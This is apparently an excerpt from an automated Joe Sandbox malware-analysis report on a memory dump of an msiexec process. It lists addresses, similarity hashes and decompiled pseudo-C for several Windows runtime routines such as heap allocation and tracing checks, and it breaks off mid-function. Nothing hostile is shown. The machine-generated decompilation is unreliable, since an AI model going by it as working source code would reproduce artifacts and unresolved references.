                              0x04d2009b
                              0x04d200f8
                              0x04d200fb
                              0x04d200fc
                              0x04d200ff
                              0x04d20108
                              0x04d20108
                              0x04d200a2
                              0x04d200a6
                              0x04d200b3
                              0x04d200bc
                              0x04d200c5
                              0x04d200ca
                              0x04d6c01e
                              0x00000000
                              0x00000000
                              0x04d6c02d
                              0x04d200d5
                              0x04d200d9
                              0x04d6c03d
                              0x04d6c046
                              0x04d6c046
                              0x04d200df
                              0x04d200e2
                              0x04d200ea
                              0x04d200ef
                              0x04d200f2
                              0x04d200f6
                              0x04d20111
                              0x04d20117
                              0x04d20117
                              0x00000000
                              0x04d200f6
                              0x04d200d0
                              0x04d200d0
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 38a51bd81de5e9abaab201bc37e33f3d073b42eab39b0d3a86151902e8273b11
                              • Instruction ID: 7c0f842b5a217116134e2ec1fd42725967072e88a76bc639d0247a406195813d
                              • Opcode Fuzzy Hash: 38a51bd81de5e9abaab201bc37e33f3d073b42eab39b0d3a86151902e8273b11
                              • Instruction Fuzzy Hash: 62317A31701A048FE722CF28CA44B9AB3E5FF88718F144569E59A87B90EA75B801CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D86C0A Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E04D86C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04D27D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4df7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04D24620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04D4F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04D27D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04D49AE0();
						_t23 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                              0x04d86c0a
                              0x04d86c0f
                              0x04d86c10
                              0x04d86c13
                              0x04d86c15
                              0x04d86c19
                              0x04d86c1c
                              0x04d86c21
                              0x04d86c28
                              0x04d86c3a
                              0x04d86c2a
                              0x04d86c33
                              0x04d86c33
                              0x04d86c3f
                              0x04d86c48
                              0x04d86c4d
                              0x04d86c60
                              0x04d86c65
                              0x04d86c69
                              0x04d86c73
                              0x04d86c79
                              0x04d86c7f
                              0x04d86c86
                              0x04d86c90
                              0x04d86c94
                              0x04d86ca6
                              0x04d86cb2
                              0x04d86cbd
                              0x04d86cbd
                              0x04d86cc3
                              0x04d86cc7
                              0x04d86ccb
                              0x04d86cd0
                              0x04d86cd1
                              0x04d86ce2
                              0x04d86ce2
                              0x04d86c69
                              0x04d86ced

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3672f6e6e7d37c82eeccee0d92a7d1c9a1253e592655a7b116855fd6b61672b
                              • Instruction ID: e58ebbf02c5cc9956423f6a39b60e3ad7beddb22a76b97f97b625901d76e5045
                              • Opcode Fuzzy Hash: e3672f6e6e7d37c82eeccee0d92a7d1c9a1253e592655a7b116855fd6b61672b
                              • Instruction Fuzzy Hash: 3E21DEB1A00654AFD721DF68D980F6AB7B8FF58718F04006AF904C7B90D634ED50CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D490AF Relevance: .1, Instructions: 76COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E04D490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04D5D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04D3E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04D24620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04D4F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04D3A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                              0x04d490af
                              0x04d490b8
                              0x04d490bb
                              0x04d490bf
                              0x04d490c2
                              0x04d490c2
                              0x04d490c8
                              0x04d490cb
                              0x04d490cd
                              0x04d814d7
                              0x04d814eb
                              0x04d814eb
                              0x00000000
                              0x04d814eb
                              0x04d814db
                              0x04d814e6
                              0x00000000
                              0x04d814f2
                              0x04d814e8
                              0x00000000
                              0x04d814e8
                              0x04d490d8
                              0x04d490da
                              0x04d490dd
                              0x04d490e5
                              0x00000000
                              0x04d49139
                              0x04d490fa
                              0x04d490fe
                              0x04d49142
                              0x00000000
                              0x04d49142
                              0x04d49104
                              0x04d49107
                              0x04d4910b
                              0x04d49110
                              0x04d49118
                              0x04d49147
                              0x04d49148
                              0x04d4914f
                              0x04d49150
                              0x04d49151
                              0x04d49152
                              0x04d49156
                              0x04d4915d
                              0x04d49160
                              0x04d49168
                              0x04d4916c
                              0x04d491bc
                              0x04d491be
                              0x00000000
                              0x04d491be
                              0x04d4916e
                              0x04d49173
                              0x04d49176
                              0x00000000
                              0x00000000
                              0x04d4917c
                              0x04d49180
                              0x04d491b5
                              0x00000000
                              0x04d491b5
                              0x04d49182
                              0x04d49185
                              0x04d49189
                              0x00000000
                              0x00000000
                              0x04d4918e
                              0x04d49190
                              0x04d49198
                              0x00000000
                              0x00000000
                              0x04d491a0
                              0x00000000
                              0x04d491ad
                              0x04d491ad
                              0x04d491b0
                              0x04d491b1
                              0x00000000
                              0x04d49185
                              0x04d4911a
                              0x04d4911c
                              0x04d4911f
                              0x04d49125
                              0x04d49127
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                              • Instruction ID: b500fb9a96da2fc98f4114f119fac233d27a81dac52f4ddb175ea24c1b59946e
                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                              • Instruction Fuzzy Hash: 7C2165B1A00605EFEB21DF69C544EAAF7F8FB84354F1484AAE985A7250D330FD45CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D33B7A Relevance: .1, Instructions: 75COMMON
                              Download Yara Rule
                              C-Code - Quality: 59%
                              			E04D33B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4df84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4df84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4df84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04D4AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04D4FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4df84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4df84c4; // 0x0
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                              0x04d33b89
                              0x04d33b96
                              0x04d33ba1
                              0x04d33bab
                              0x04d33bb5
                              0x04d33bb9
                              0x04d76298
                              0x04d33bbf
                              0x04d33bc2
                              0x04d33bc3
                              0x04d33bc9
                              0x04d33bca
                              0x04d33bcc
                              0x04d33bcd
                              0x04d33bd4
                              0x04d33bd6
                              0x04d33bdb
                              0x04d33bea
                              0x04d33bf7
                              0x04d33bfb
                              0x04d33bff
                              0x04d33c09
                              0x04d33c0a
                              0x04d33c0b
                              0x04d33c0f
                              0x04d33c14
                              0x04d33c18
                              0x04d33c18
                              0x04d33bfb
                              0x04d33c1b
                              0x04d33c30
                              0x04d33c30
                              0x04d33c3d

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12df366244129751250981d08b5cd2d804d88a8b48613ae18283886f8df74ba9
                              • Instruction ID: c1792f6008f9b655b35e29d2ee94ee34ecee041c800d1711e9067ec88bc30c09
                              • Opcode Fuzzy Hash: 12df366244129751250981d08b5cd2d804d88a8b48613ae18283886f8df74ba9
                              • Instruction Fuzzy Hash: 53219F72A00118AFDB15DF58CE81B5AB7BDFB44708F150068F908AB251D775FD11DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D86CF0 Relevance: .1, Instructions: 74COMMON
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E04D86CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04D27D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04D27D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4ce5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04D3F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04D3F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04D87016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04D22400( &_v52);
								}
								_t21 = L04D22400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                              0x04d86cfb
                              0x04d86d00
                              0x04d86d02
                              0x04d86d06
                              0x04d86d0a
                              0x04d86d0e
                              0x04d86d19
                              0x04d86d2b
                              0x04d86d1b
                              0x04d86d24
                              0x04d86d24
                              0x04d86d33
                              0x04d86d39
                              0x04d86d46
                              0x04d86d4f
                              0x04d86d61
                              0x04d86d51
                              0x04d86d5a
                              0x04d86d5a
                              0x04d86d69
                              0x04d86d6b
                              0x04d86d6d
                              0x04d86d6f
                              0x04d86d6f
                              0x04d86d74
                              0x04d86d79
                              0x04d86d7a
                              0x04d86d7f
                              0x04d86d82
                              0x04d86d88
                              0x04d86d89
                              0x04d86d90
                              0x04d86d94
                              0x04d86da7
                              0x04d86db1
                              0x04d86db1
                              0x04d86dbb
                              0x04d86dbb
                              0x04d86d90
                              0x04d86d69
                              0x04d86d46
                              0x04d86dc6

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f5b37bdadcea927faba16a9b51710a4288f934d7df11efcc2028f82b960aa95
                              • Instruction ID: b7600d9c400e97a4ea5721428bbd50b2d5159db1239e8640270423649a28d3ce
                              • Opcode Fuzzy Hash: 1f5b37bdadcea927faba16a9b51710a4288f934d7df11efcc2028f82b960aa95
                              • Instruction Fuzzy Hash: 2621D372600644ABD311EF69CA44B77B7ECEF91768F04045AF94087261E734F509C6A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD070D Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              C-Code - Quality: 67%
                              			E04DD070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04DD07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04DCAFDE( &_v8,  &_v12);
					E04DD1293(_t38, _v28, _t60);
					if(E04D27D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04DC14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                              0x04dd071b
                              0x04dd0724
                              0x04dd0734
                              0x04dd0738
                              0x04dd074b
                              0x04dd074b
                              0x04dd0753
                              0x04dd0753
                              0x04dd0759
                              0x04dd075d
                              0x04dd0774
                              0x04dd0779
                              0x04dd077d
                              0x04dd0789
                              0x04dd0795
                              0x04dd07a7
                              0x04dd0797
                              0x04dd07a0
                              0x04dd07a0
                              0x04dd07af
                              0x04dd07c4
                              0x04dd07cd
                              0x04dd07cd
                              0x04dd07af
                              0x04dd07dc

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                              • Instruction ID: 7aa4bc7070385fc6a215a19ad4f188b075a3ae1c429e27fb0b32ffa346573b8a
                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                              • Instruction Fuzzy Hash: 3821C236304204AFD716DF18C884B6ABBA5FBC4758F048569F9959F385D630E909CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D2AE73 Relevance: .1, Instructions: 70COMMON
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E04D2AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04D27D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04D27D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04D27D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04D27D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04D87794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                              0x04d2ae78
                              0x04d2ae7c
                              0x04d2ae7e
                              0x04d2ae81
                              0x04d2ae86
                              0x04d2ae8d
                              0x04d72691
                              0x04d2ae93
                              0x04d2ae93
                              0x04d2ae93
                              0x04d2ae98
                              0x04d2ae9d
                              0x04d726a2
                              0x04d726b4
                              0x04d726a4
                              0x04d726ad
                              0x04d726ad
                              0x04d726b9
                              0x00000000
                              0x04d726bb
                              0x00000000
                              0x04d726bb
                              0x04d2aea3
                              0x04d2aea3
                              0x04d2aea3
                              0x04d2aeaa
                              0x04d726c0
                              0x04d726c9
                              0x04d726c9
                              0x04d2aeb3
                              0x04d726d4
                              0x04d726e1
                              0x00000000
                              0x00000000
                              0x04d726e7
                              0x04d726ee
                              0x04d726f0
                              0x04d726f9
                              0x04d726f9
                              0x04d72702
                              0x04d72708
                              0x04d72708
                              0x04d7270b
                              0x04d7270f
                              0x04d72711
                              0x04d72711
                              0x04d72725
                              0x04d72725
                              0x00000000
                              0x04d2aeb9
                              0x04d2aeb9
                              0x04d2aebf
                              0x04d2aebf
                              0x04d2aeb3

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                              • Instruction ID: d26f75beb8e8b640f0ff9f7d80bfe3d18e93b275e770bc59672463767427f52d
                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                              • Instruction Fuzzy Hash: EB21AC717016919BEB269B28CA84B2977E8FB54748F1900E2DD048B7A2F778FC41C6A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D87794 Relevance: .1, Instructions: 70COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E04D87794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4df7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04D4F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04D27D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04D49AE0();
					_t24 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                              0x04d87799
                              0x04d8779a
                              0x04d8779b
                              0x04d877a3
                              0x04d877ab
                              0x04d877ae
                              0x04d877b1
                              0x04d877b1
                              0x04d877bf
                              0x04d877c4
                              0x04d877c8
                              0x04d877ce
                              0x04d877d4
                              0x04d877e0
                              0x04d877e0
                              0x04d877d6
                              0x04d877d6
                              0x04d877de
                              0x00000000
                              0x00000000
                              0x04d877de
                              0x04d877e5
                              0x04d877f0
                              0x04d877f3
                              0x04d877f6
                              0x04d877fd
                              0x04d87800
                              0x04d8780c
                              0x04d87818
                              0x04d8782b
                              0x04d8781a
                              0x04d87823
                              0x04d87823
                              0x04d87830
                              0x04d87831
                              0x04d87838
                              0x04d8783d
                              0x04d8783e
                              0x04d8784f
                              0x04d8784f
                              0x04d8785a

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f23bd898612da04b9f74ded6e5bb1fc1aa7ff7a903b83bcbf913d9da656e7d3
                              • Instruction ID: 312ce0faf973850a3ba135ccc7e23f50b4dd0f6b3523aaf546b730056fc8eb92
                              • Opcode Fuzzy Hash: 1f23bd898612da04b9f74ded6e5bb1fc1aa7ff7a903b83bcbf913d9da656e7d3
                              • Instruction Fuzzy Hash: 06219D72A00604ABC725EF69DC90EABB7B8FF88744F10056DE90AC7750E634E900CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3FD9B Relevance: .1, Instructions: 69COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E04D3FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04D176E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
